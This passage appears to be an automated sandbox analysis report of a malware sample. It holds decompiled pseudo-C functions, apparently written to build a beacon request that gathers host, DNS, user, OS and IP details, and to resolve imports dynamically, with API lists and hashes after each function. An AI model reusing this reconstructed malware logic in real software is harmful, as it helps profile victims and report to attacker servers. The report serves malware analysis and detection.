                                                          				_t26 =  *0x463d018; // 0xf1c1aee9
                                                          				asm("bswap eax");
                                                          				_t27 =  *0x463d014; // 0x3a87c8cd
                                                          				asm("bswap eax");
                                                          				_t28 =  *0x463d010; // 0xd8d2f808
                                                          				asm("bswap eax");
                                                          				_t29 = E0463D00C; // 0xeec43f25
                                                          				asm("bswap eax");
                                                          				_t30 =  *0x463d2a8; // 0x88a5a8
                                                          				_t3 = _t30 + 0x463e633; // 0x74666f73
                                                          				_t101 = wsprintfA(_t105, _t3, 2, 0x3d15e, _t29, _t28, _t27, _t26,  *0x463d02c,  *0x463d004, _t25);
                                                          				_t33 = E046356CD();
                                                          				_t34 =  *0x463d2a8; // 0x88a5a8
                                                          				_t4 = _t34 + 0x463e673; // 0x74707526
                                                          				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
                                                          				_t108 = _t106 + 0x38;
                                                          				_t102 = _t101 + _t37;
                                                          				_t96 = E046358DB(_t91);
                                                          				if(_t96 != 0) {
                                                          					_t83 =  *0x463d2a8; // 0x88a5a8
                                                          					_t6 = _t83 + 0x463e8d4; // 0x736e6426
                                                          					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
                                                          					_t108 = _t108 + 0xc;
                                                          					_t102 = _t102 + _t86;
                                                          					HeapFree( *0x463d238, 0, _t96);
                                                          				}
                                                          				_t97 = E0463A199();
                                                          				if(_t97 != 0) {
                                                          					_t78 =  *0x463d2a8; // 0x88a5a8
                                                          					_t8 = _t78 + 0x463e8dc; // 0x6f687726
                                                          					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
                                                          					_t108 = _t108 + 0xc;
                                                          					_t102 = _t102 + _t81;
                                                          					HeapFree( *0x463d238, 0, _t97);
                                                          				}
                                                          				_t98 =  *0x463d32c; // 0x4ec95b0
                                                          				_a32 = E04634622(0x463d00a, _t98 + 4);
                                                          				_t42 =  *0x463d2d0; // 0x0
                                                          				if(_t42 != 0) {
                                                          					_t74 =  *0x463d2a8; // 0x88a5a8
                                                          					_t11 = _t74 + 0x463e8b6; // 0x3d736f26
                                                          					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
                                                          					_t108 = _t108 + 0xc;
                                                          					_t102 = _t102 + _t77;
                                                          				}
                                                          				_t43 =  *0x463d2cc; // 0x0
                                                          				if(_t43 != 0) {
                                                          					_t71 =  *0x463d2a8; // 0x88a5a8
                                                          					_t13 = _t71 + 0x463e88d; // 0x3d706926
                                                          					wsprintfA(_t102 + _t105, _t13, _t43);
                                                          				}
                                                          				if(_a32 != 0) {
                                                          					_t100 = RtlAllocateHeap( *0x463d238, 0, 0x800);
                                                          					if(_t100 != 0) {
                                                          						E0463518F(GetTickCount());
                                                          						_t50 =  *0x463d32c; // 0x4ec95b0
                                                          						__imp__(_t50 + 0x40);
                                                          						asm("lock xadd [eax], ecx");
                                                          						_t54 =  *0x463d32c; // 0x4ec95b0
                                                          						__imp__(_t54 + 0x40);
                                                          						_t56 =  *0x463d32c; // 0x4ec95b0
                                                          						_t103 = E04631BB6(1, _t95, _t105,  *_t56);
                                                          						asm("lock xadd [eax], ecx");
                                                          						if(_t103 != 0) {
                                                          							StrTrimA(_t103, 0x463c28c);
                                                          							_push(_t103);
                                                          							_t62 = E0463361A();
                                                          							_v16 = _t62;
                                                          							if(_t62 != 0) {
                                                          								_t89 = __imp__;
                                                          								 *_t89(_t103, _v0);
                                                          								 *_t89(_t100, _a4);
                                                          								_t90 = __imp__;
                                                          								 *_t90(_t100, _v28);
                                                          								 *_t90(_t100, _t103);
                                                          								_t68 = E04636777(0xffffffffffffffff, _t100, _v28, _v24);
                                                          								_v52 = _t68;
                                                          								if(_t68 != 0 && _t68 != 0x10d2) {
                                                          									E04636761();
                                                          								}
                                                          								HeapFree( *0x463d238, 0, _v44);
                                                          							}
                                                          							HeapFree( *0x463d238, 0, _t103);
                                                          						}
                                                          						HeapFree( *0x463d238, 0, _t100);
                                                          					}
                                                          					HeapFree( *0x463d238, 0, _a24);
                                                          				}
                                                          				HeapFree( *0x463d238, 0, _t105);
                                                          				return _a12;
                                                          			}

















































                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 04631F2A
                                                          • wsprintfA.USER32 ref: 04631F77
                                                          • wsprintfA.USER32 ref: 04631F94
                                                          • wsprintfA.USER32 ref: 04631FB7
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04631FC7
                                                          • wsprintfA.USER32 ref: 04631FE9
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04631FF9
                                                          • wsprintfA.USER32 ref: 04632030
                                                          • wsprintfA.USER32 ref: 04632050
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0463206D
                                                          • GetTickCount.KERNEL32 ref: 0463207D
                                                          • RtlEnterCriticalSection.NTDLL(04EC9570), ref: 04632091
                                                          • RtlLeaveCriticalSection.NTDLL(04EC9570), ref: 046320AF
                                                            • Part of subcall function 04631BB6: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,046320C2,?,04EC95B0), ref: 04631BE1
                                                            • Part of subcall function 04631BB6: lstrlen.KERNEL32(?,?,?,046320C2,?,04EC95B0), ref: 04631BE9
                                                            • Part of subcall function 04631BB6: strcpy.NTDLL ref: 04631C00
                                                            • Part of subcall function 04631BB6: lstrcat.KERNEL32(00000000,?), ref: 04631C0B
                                                            • Part of subcall function 04631BB6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,046320C2,?,04EC95B0), ref: 04631C28
                                                          • StrTrimA.SHLWAPI(00000000,0463C28C,?,04EC95B0), ref: 046320E1
                                                            • Part of subcall function 0463361A: lstrlen.KERNEL32(04EC9A78,00000000,00000000,7742C740,046320ED,00000000), ref: 0463362A
                                                            • Part of subcall function 0463361A: lstrlen.KERNEL32(?), ref: 04633632
                                                            • Part of subcall function 0463361A: lstrcpy.KERNEL32(00000000,04EC9A78), ref: 04633646
                                                            • Part of subcall function 0463361A: lstrcat.KERNEL32(00000000,?), ref: 04633651
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 04632100
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04632107
                                                          • lstrcat.KERNEL32(00000000,?), ref: 04632114
                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 04632118
                                                            • Part of subcall function 04636777: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74B481D0), ref: 04636829
                                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04632148
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04632157
                                                          • HeapFree.KERNEL32(00000000,00000000,?,04EC95B0), ref: 04632166
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04632178
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04632187
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                                          • String ID:
                                                          • API String ID: 3080378247-0
                                                          • Opcode ID: 77891bb105fbbba7fe172dcb8ca90eee7dd021d5df73b86056792cbeed9b2673
                                                          • Instruction ID: 55e5909741bfa70ce822338a0a20123ccbe046a5d120d8f0f95475f0fcbc6c56
                                                          • Opcode Fuzzy Hash: 77891bb105fbbba7fe172dcb8ca90eee7dd021d5df73b86056792cbeed9b2673
                                                          • Instruction Fuzzy Hash: BB619D325002C4AFE721EBA8EC88E5677E9EB4974AF041514FA05D7260FB3EEC05DB65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 74%
                                                          			E04634AB6(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                                          				void* _v8;
                                                          				signed int _v12;
                                                          				void* _v16;
                                                          				void* _v20;
                                                          				void* _v24;
                                                          				void* _v28;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				long _t59;
                                                          				intOrPtr _t60;
                                                          				intOrPtr _t61;
                                                          				intOrPtr _t62;
                                                          				intOrPtr _t63;
                                                          				intOrPtr _t64;
                                                          				void* _t67;
                                                          				intOrPtr _t68;
                                                          				int _t71;
                                                          				void* _t72;
                                                          				void* _t73;
                                                          				void* _t75;
                                                          				void* _t78;
                                                          				intOrPtr _t82;
                                                          				intOrPtr _t86;
                                                          				intOrPtr* _t88;
                                                          				void* _t94;
                                                          				intOrPtr _t100;
                                                          				signed int _t104;
                                                          				char** _t106;
                                                          				int _t109;
                                                          				intOrPtr* _t112;
                                                          				intOrPtr* _t114;
                                                          				intOrPtr* _t116;
                                                          				intOrPtr* _t118;
                                                          				intOrPtr _t121;
                                                          				intOrPtr _t126;
                                                          				int _t130;
                                                          				CHAR* _t132;
                                                          				intOrPtr _t133;
                                                          				void* _t134;
                                                          				void* _t143;
                                                          				int _t144;
                                                          				void* _t145;
                                                          				intOrPtr _t146;
                                                          				void* _t148;
                                                          				long _t152;
                                                          				intOrPtr* _t153;
                                                          				intOrPtr* _t154;
                                                          				intOrPtr* _t157;
                                                          				void* _t158;
                                                          				void* _t160;
                                                          
                                                          				_t143 = __edx;
                                                          				_t134 = __ecx;
                                                          				_t59 = __eax;
                                                          				_v12 = 8;
                                                          				if(__eax == 0) {
                                                          					_t59 = GetTickCount();
                                                          				}
                                                          				_t60 =  *0x463d018; // 0xf1c1aee9
                                                          				asm("bswap eax");
                                                          				_t61 =  *0x463d014; // 0x3a87c8cd
                                                          				_t132 = _a16;
                                                          				asm("bswap eax");
                                                          				_t62 =  *0x463d010; // 0xd8d2f808
                                                          				asm("bswap eax");
                                                          				_t63 = E0463D00C; // 0xeec43f25
                                                          				asm("bswap eax");
                                                          				_t64 =  *0x463d2a8; // 0x88a5a8
                                                          				_t3 = _t64 + 0x463e633; // 0x74666f73
                                                          				_t144 = wsprintfA(_t132, _t3, 3, 0x3d15e, _t63, _t62, _t61, _t60,  *0x463d02c,  *0x463d004, _t59);
                                                          				_t67 = E046356CD();
                                                          				_t68 =  *0x463d2a8; // 0x88a5a8
                                                          				_t4 = _t68 + 0x463e673; // 0x74707526
                                                          				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
                                                          				_t160 = _t158 + 0x38;
                                                          				_t145 = _t144 + _t71;
                                                          				_t72 = E046358DB(_t134);
                                                          				_t133 = __imp__;
                                                          				_v8 = _t72;
                                                          				if(_t72 != 0) {
                                                          					_t126 =  *0x463d2a8; // 0x88a5a8
                                                          					_t7 = _t126 + 0x463e8d4; // 0x736e6426
                                                          					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
                                                          					_t160 = _t160 + 0xc;
                                                          					_t145 = _t145 + _t130;
                                                          					HeapFree( *0x463d238, 0, _v8);
                                                          				}
                                                          				_t73 = E0463A199();
                                                          				_v8 = _t73;
                                                          				if(_t73 != 0) {
                                                          					_t121 =  *0x463d2a8; // 0x88a5a8
                                                          					_t11 = _t121 + 0x463e8dc; // 0x6f687726
                                                          					wsprintfA(_t145 + _a16, _t11, _t73);
                                                          					_t160 = _t160 + 0xc;
                                                          					HeapFree( *0x463d238, 0, _v8);
                                                          				}
                                                          				_t146 =  *0x463d32c; // 0x4ec95b0
                                                          				_t75 = E04634622(0x463d00a, _t146 + 4);
                                                          				_t152 = 0;
                                                          				_v20 = _t75;
                                                          				if(_t75 == 0) {
                                                          					L26:
                                                          					HeapFree( *0x463d238, _t152, _a16);
                                                          					return _v12;
                                                          				} else {
                                                          					_t78 = RtlAllocateHeap( *0x463d238, 0, 0x800);
                                                          					_v8 = _t78;
                                                          					if(_t78 == 0) {
                                                          						L25:
                                                          						HeapFree( *0x463d238, _t152, _v20);
                                                          						goto L26;
                                                          					}
                                                          					E0463518F(GetTickCount());
                                                          					_t82 =  *0x463d32c; // 0x4ec95b0
                                                          					__imp__(_t82 + 0x40);
                                                          					asm("lock xadd [eax], ecx");
                                                          					_t86 =  *0x463d32c; // 0x4ec95b0
                                                          					__imp__(_t86 + 0x40);
                                                          					_t88 =  *0x463d32c; // 0x4ec95b0
                                                          					_t148 = E04631BB6(1, _t143, _a16,  *_t88);
                                                          					_v28 = _t148;
                                                          					asm("lock xadd [eax], ecx");
                                                          					if(_t148 == 0) {
                                                          						L24:
                                                          						HeapFree( *0x463d238, _t152, _v8);
                                                          						goto L25;
                                                          					}
                                                          					StrTrimA(_t148, 0x463c28c);
                                                          					_push(_t148);
                                                          					_t94 = E0463361A();
                                                          					_v16 = _t94;
                                                          					if(_t94 == 0) {
                                                          						L23:
                                                          						HeapFree( *0x463d238, _t152, _t148);
                                                          						goto L24;
                                                          					}
                                                          					_t153 = __imp__;
                                                          					 *_t153(_t148, _a4);
                                                          					 *_t153(_v8, _v20);
                                                          					_t154 = __imp__;
                                                          					 *_t154(_v8, _v16);
                                                          					_t100 = E04639070( *_t154(_v8, _t148), _v8);
                                                          					_a4 = _t100;
                                                          					if(_t100 == 0) {
                                                          						_v12 = 8;
                                                          						L21:
                                                          						E04636761();
                                                          						L22:
                                                          						HeapFree( *0x463d238, 0, _v16);
                                                          						_t152 = 0;
                                                          						goto L23;
                                                          					}
                                                          					_t104 = E046369B4(_t133, 0xffffffffffffffff, _t148,  &_v24);
                                                          					_v12 = _t104;
                                                          					if(_t104 == 0) {
                                                          						_t157 = _v24;
                                                          						_v12 = E0463391F(_t157, _a4, _a8, _a12);
                                                          						_t112 =  *((intOrPtr*)(_t157 + 8));
                                                          						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
                                                          						_t114 =  *((intOrPtr*)(_t157 + 8));
                                                          						 *((intOrPtr*)( *_t114 + 8))(_t114);
                                                          						_t116 =  *((intOrPtr*)(_t157 + 4));
                                                          						 *((intOrPtr*)( *_t116 + 8))(_t116);
                                                          						_t118 =  *_t157;
                                                          						 *((intOrPtr*)( *_t118 + 8))(_t118);
                                                          						E0463A734(_t157);
                                                          					}
                                                          					if(_v12 != 0x10d2) {
                                                          						L16:
                                                          						if(_v12 == 0) {
                                                          							_t106 = _a8;
                                                          							if(_t106 != 0) {
                                                          								_t149 =  *_t106;
                                                          								_t155 =  *_a12;
                                                          								wcstombs( *_t106,  *_t106,  *_a12);
                                                          								_t109 = E04635800(_t149, _t149, _t155 >> 1);
                                                          								_t148 = _v28;
                                                          								 *_a12 = _t109;
                                                          							}
                                                          						}
                                                          						goto L19;
                                                          					} else {
                                                          						if(_a8 != 0) {
                                                          							L19:
                                                          							E0463A734(_a4);
                                                          							if(_v12 == 0 || _v12 == 0x10d2) {
                                                          								goto L22;
                                                          							} else {
                                                          								goto L21;
                                                          							}
                                                          						}
                                                          						_v12 = _v12 & 0x00000000;
                                                          						goto L16;
                                                          					}
                                                          				}
                                                          			}


                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 04634ACA
                                                          • wsprintfA.USER32 ref: 04634B1A
                                                          • wsprintfA.USER32 ref: 04634B37
                                                          • wsprintfA.USER32 ref: 04634B63
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04634B75
                                                          • wsprintfA.USER32 ref: 04634B96
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04634BA6
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04634BD4
                                                          • GetTickCount.KERNEL32 ref: 04634BE5
                                                          • RtlEnterCriticalSection.NTDLL(04EC9570), ref: 04634BF9
                                                          • RtlLeaveCriticalSection.NTDLL(04EC9570), ref: 04634C17
                                                            • Part of subcall function 04631BB6: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,046320C2,?,04EC95B0), ref: 04631BE1
                                                            • Part of subcall function 04631BB6: lstrlen.KERNEL32(?,?,?,046320C2,?,04EC95B0), ref: 04631BE9
                                                            • Part of subcall function 04631BB6: strcpy.NTDLL ref: 04631C00
                                                            • Part of subcall function 04631BB6: lstrcat.KERNEL32(00000000,?), ref: 04631C0B
                                                            • Part of subcall function 04631BB6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,046320C2,?,04EC95B0), ref: 04631C28
                                                          • StrTrimA.SHLWAPI(00000000,0463C28C,?,04EC95B0), ref: 04634C4E
                                                            • Part of subcall function 0463361A: lstrlen.KERNEL32(04EC9A78,00000000,00000000,7742C740,046320ED,00000000), ref: 0463362A
                                                            • Part of subcall function 0463361A: lstrlen.KERNEL32(?), ref: 04633632
                                                            • Part of subcall function 0463361A: lstrcpy.KERNEL32(00000000,04EC9A78), ref: 04633646
                                                            • Part of subcall function 0463361A: lstrcat.KERNEL32(00000000,?), ref: 04633651
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 04634C6F
                                                          • lstrcpy.KERNEL32(?,?), ref: 04634C77
                                                          • lstrcat.KERNEL32(?,?), ref: 04634C85
                                                          • lstrcat.KERNEL32(?,00000000), ref: 04634C8B
                                                            • Part of subcall function 04639070: lstrlen.KERNEL32(?,00000000,04EC9A98,00000000,04638808,04EC9C76,?,?,?,?,?,63699BC3,00000005,0463D00C), ref: 04639077
                                                            • Part of subcall function 04639070: mbstowcs.NTDLL ref: 046390A0
                                                            • Part of subcall function 04639070: memset.NTDLL ref: 046390B2
                                                          • wcstombs.NTDLL ref: 04634D1C
                                                            • Part of subcall function 0463391F: SysAllocString.OLEAUT32(?), ref: 0463395A
                                                            • Part of subcall function 0463A734: HeapFree.KERNEL32(00000000,00000000,04635637,00000000,?,?,00000000), ref: 0463A740
                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 04634D5D
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04634D69
                                                          • HeapFree.KERNEL32(00000000,?,?,04EC95B0), ref: 04634D75
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04634D81
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04634D8D
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                                          • String ID:
                                                          • API String ID: 3748877296-0
                                                          • Opcode ID: e2873744ec45c66b1aa78f32ee0737518a9d64fd259a12d7c790f695815719d3
                                                          • Instruction ID: 2165f5fb930adfbc3128a1573e465f2c4130a5f71be1a8a0416827f74bab1ec9
                                                          • Opcode Fuzzy Hash: e2873744ec45c66b1aa78f32ee0737518a9d64fd259a12d7c790f695815719d3
                                                          • Instruction Fuzzy Hash: 01915971900188BFDB11DFA4DC88AAEBBB9EF09316F144055F905E7260EB39ED51DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 51%
                                                          			E0463AC55(long _a4, long _a8) {
                                                          				signed int _v8;
                                                          				intOrPtr _v16;
                                                          				LONG* _v28;
                                                          				long _v40;
                                                          				long _v44;
                                                          				long _v48;
                                                          				CHAR* _v52;
                                                          				long _v56;
                                                          				CHAR* _v60;
                                                          				long _v64;
                                                          				signed int* _v68;
                                                          				char _v72;
                                                          				signed int _t76;
                                                          				signed int _t80;
                                                          				signed int _t81;
                                                          				intOrPtr* _t82;
                                                          				intOrPtr* _t83;
                                                          				intOrPtr* _t85;
                                                          				intOrPtr* _t90;
                                                          				intOrPtr* _t95;
                                                          				intOrPtr* _t98;
                                                          				void* _t102;
                                                          				intOrPtr* _t104;
                                                          				void* _t115;
                                                          				long _t116;
                                                          				void _t125;
                                                          				void* _t131;
                                                          				signed short _t133;
                                                          				struct HINSTANCE__* _t138;
                                                          				signed int* _t139;
                                                          
                                                          				_t139 = _a4;
                                                          				_v28 = _t139[2] + 0x4630000;
                                                          				_t115 = _t139[3] + 0x4630000;
                                                          				_t131 = _t139[4] + 0x4630000;
                                                          				_v8 = _t139[7];
                                                          				_v60 = _t139[1] + 0x4630000;
                                                          				_v16 = _t139[5] + 0x4630000;
                                                          				_v64 = _a8;
                                                          				_v72 = 0x24;
                                                          				_v68 = _t139;
                                                          				_v56 = 0;
                                                          				asm("stosd");
                                                          				_v48 = 0;
                                                          				_v44 = 0;
                                                          				_v40 = 0;
                                                          				if(( *_t139 & 0x00000001) == 0) {
                                                          					_a8 =  &_v72;
                                                          					RaiseException(0xc06d0057, 0, 1,  &_a8);
                                                          					return 0;
                                                          				}
                                                          				_t138 =  *_v28;
                                                          				_t76 = _a8 - _t115 >> 2 << 2;
                                                          				_t133 =  *(_t131 + _t76);
                                                          				_a4 = _t76;
                                                          				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                                                          				_v56 = _t80;
                                                          				_t81 = _t133 + 0x4630002;
                                                          				if(_t80 == 0) {
                                                          					_t81 = _t133 & 0x0000ffff;
                                                          				}
                                                          				_v52 = _t81;
                                                          				_t82 =  *0x463d1a0; // 0x0
                                                          				_t116 = 0;
                                                          				if(_t82 == 0) {
                                                          					L6:
                                                          					if(_t138 != 0) {
                                                          						L18:
                                                          						_t83 =  *0x463d1a0; // 0x0
                                                          						_v48 = _t138;
                                                          						if(_t83 != 0) {
                                                          							_t116 =  *_t83(2,  &_v72);
                                                          						}
                                                          						if(_t116 != 0) {
                                                          							L32:
                                                          							 *_a8 = _t116;
                                                          							L33:
                                                          							_t85 =  *0x463d1a0; // 0x0
                                                          							if(_t85 != 0) {
                                                          								_v40 = _v40 & 0x00000000;
                                                          								_v48 = _t138;
                                                          								_v44 = _t116;
                                                          								 *_t85(5,  &_v72);
                                                          							}
                                                          							return _t116;
                                                          						} else {
                                                          							if(_t139[5] == _t116 || _t139[7] == _t116) {
                                                          								L27:
                                                          								_t116 = GetProcAddress(_t138, _v52);
                                                          								if(_t116 == 0) {
                                                          									_v40 = GetLastError();
                                                          									_t90 =  *0x463d19c; // 0x0
                                                          									if(_t90 != 0) {
                                                          										_t116 =  *_t90(4,  &_v72);
                                                          									}
                                                          									if(_t116 == 0) {
                                                          										_a4 =  &_v72;
                                                          										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                                                          										_t116 = _v44;
                                                          									}
                                                          								}
                                                          								goto L32;
                                                          							} else {
                                                          								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                                                          								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                                                          									_t116 =  *(_a4 + _v16);
                                                          									if(_t116 != 0) {
                                                          										goto L32;
                                                          									}
                                                          								}
                                                          								goto L27;
                                                          							}
                                                          						}
                                                          					}
                                                          					_t98 =  *0x463d1a0; // 0x0
                                                          					if(_t98 == 0) {
                                                          						L9:
                                                          						_t138 = LoadLibraryA(_v60);
                                                          						if(_t138 != 0) {
                                                          							L13:
                                                          							if(InterlockedExchange(_v28, _t138) == _t138) {
                                                          								FreeLibrary(_t138);
                                                          							} else {
                                                          								if(_t139[6] != 0) {
                                                          									_t102 = LocalAlloc(0x40, 8);
                                                          									if(_t102 != 0) {
                                                          										 *(_t102 + 4) = _t139;
                                                          										_t125 =  *0x463d198; // 0x0
                                                          										 *_t102 = _t125;
                                                          										 *0x463d198 = _t102;
                                                          									}
                                                          								}
                                                          							}
                                                          							goto L18;
                                                          						}
                                                          						_v40 = GetLastError();
                                                          						_t104 =  *0x463d19c; // 0x0
                                                          						if(_t104 == 0) {
                                                          							L12:
                                                          							_a8 =  &_v72;
                                                          							RaiseException(0xc06d007e, 0, 1,  &_a8);
                                                          							return _v44;
                                                          						}
                                                          						_t138 =  *_t104(3,  &_v72);
                                                          						if(_t138 != 0) {
                                                          							goto L13;
                                                          						}
                                                          						goto L12;
                                                          					}
                                                          					_t138 =  *_t98(1,  &_v72);
                                                          					if(_t138 != 0) {
                                                          						goto L13;
                                                          					}
                                                          					goto L9;
                                                          				}
                                                          				_t116 =  *_t82(0,  &_v72);
                                                          				if(_t116 != 0) {
                                                          					goto L33;
                                                          				}
                                                          				goto L6;
                                                          			}


                                                          APIs
                                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0463ACCE
                                                          • LoadLibraryA.KERNEL32(?), ref: 0463AD4B
                                                          • GetLastError.KERNEL32 ref: 0463AD57
                                                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 0463AD8A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                          • String ID: $
                                                          • API String ID: 948315288-3993045852
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 27%
                                                          			E04636C38(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _v12;
                                                          				long _v16;
                                                          				intOrPtr _v20;
                                                          				signed int _v24;
                                                          				void* __esi;
                                                          				long _t43;
                                                          				intOrPtr _t44;
                                                          				intOrPtr _t46;
                                                          				void* _t48;
                                                          				void* _t49;
                                                          				void* _t50;
                                                          				intOrPtr _t54;
                                                          				intOrPtr _t57;
                                                          				void* _t58;
                                                          				void* _t59;
                                                          				void* _t60;
                                                          				intOrPtr _t66;
                                                          				void* _t71;
                                                          				void* _t74;
                                                          				intOrPtr _t75;
                                                          				void* _t77;
                                                          				intOrPtr _t79;
                                                          				intOrPtr* _t80;
                                                          				intOrPtr _t91;
                                                          
                                                          				_t79 =  *0x463d33c; // 0x4ec9798
                                                          				_v24 = 8;
                                                          				_t43 = GetTickCount();
                                                          				_push(5);
                                                          				_t74 = 0xa;
                                                          				_v16 = _t43;
                                                          				_t44 = E0463A557(_t74,  &_v16);
                                                          				_v8 = _t44;
                                                          				if(_t44 == 0) {
                                                          					_v8 = 0x463c18c;
                                                          				}
                                                          				_t46 = E046318A5(_t79);
                                                          				_v12 = _t46;
                                                          				if(_t46 != 0) {
                                                          					_t80 = __imp__;
                                                          					_t48 =  *_t80(_v8, _t71);
                                                          					_t49 =  *_t80(_v12);
                                                          					_t50 =  *_t80(_a4);
                                                          					_t54 = E0463A71F(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                                                          					_v20 = _t54;
                                                          					if(_t54 != 0) {
                                                          						_t75 =  *0x463d2a8; // 0x88a5a8
                                                          						_t16 = _t75 + 0x463eb08; // 0x530025
                                                          						 *0x463d118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
                                                          						_push(4);
                                                          						_t77 = 5;
                                                          						_t57 = E0463A557(_t77,  &_v16);
                                                          						_v8 = _t57;
                                                          						if(_t57 == 0) {
                                                          							_v8 = 0x463c190;
                                                          						}
                                                          						_t58 =  *_t80(_v8);
                                                          						_t59 =  *_t80(_v12);
                                                          						_t60 =  *_t80(_a4);
                                                          						_t91 = E0463A71F(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                                                          						if(_t91 == 0) {
                                                          							E0463A734(_v20);
                                                          						} else {
                                                          							_t66 =  *0x463d2a8; // 0x88a5a8
                                                          							_t31 = _t66 + 0x463ec28; // 0x73006d
                                                          							 *0x463d118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
                                                          							 *_a16 = _v20;
                                                          							_v24 = _v24 & 0x00000000;
                                                          							 *_a20 = _t91;
                                                          						}
                                                          					}
                                                          					E0463A734(_v12);
                                                          				}
                                                          				return _v24;
                                                          			}


                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 04636C4D
                                                          • lstrlen.KERNEL32(?,80000002,00000005), ref: 04636C8D
                                                          • lstrlen.KERNEL32(00000000), ref: 04636C96
                                                          • lstrlen.KERNEL32(00000000), ref: 04636C9D
                                                          • lstrlenW.KERNEL32(80000002), ref: 04636CAA
                                                          • lstrlen.KERNEL32(?,00000004), ref: 04636D0A
                                                          • lstrlen.KERNEL32(?), ref: 04636D13
                                                          • lstrlen.KERNEL32(?), ref: 04636D1A
                                                          • lstrlenW.KERNEL32(?), ref: 04636D21
                                                            • Part of subcall function 0463A734: HeapFree.KERNEL32(00000000,00000000,04635637,00000000,?,?,00000000), ref: 0463A740
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp
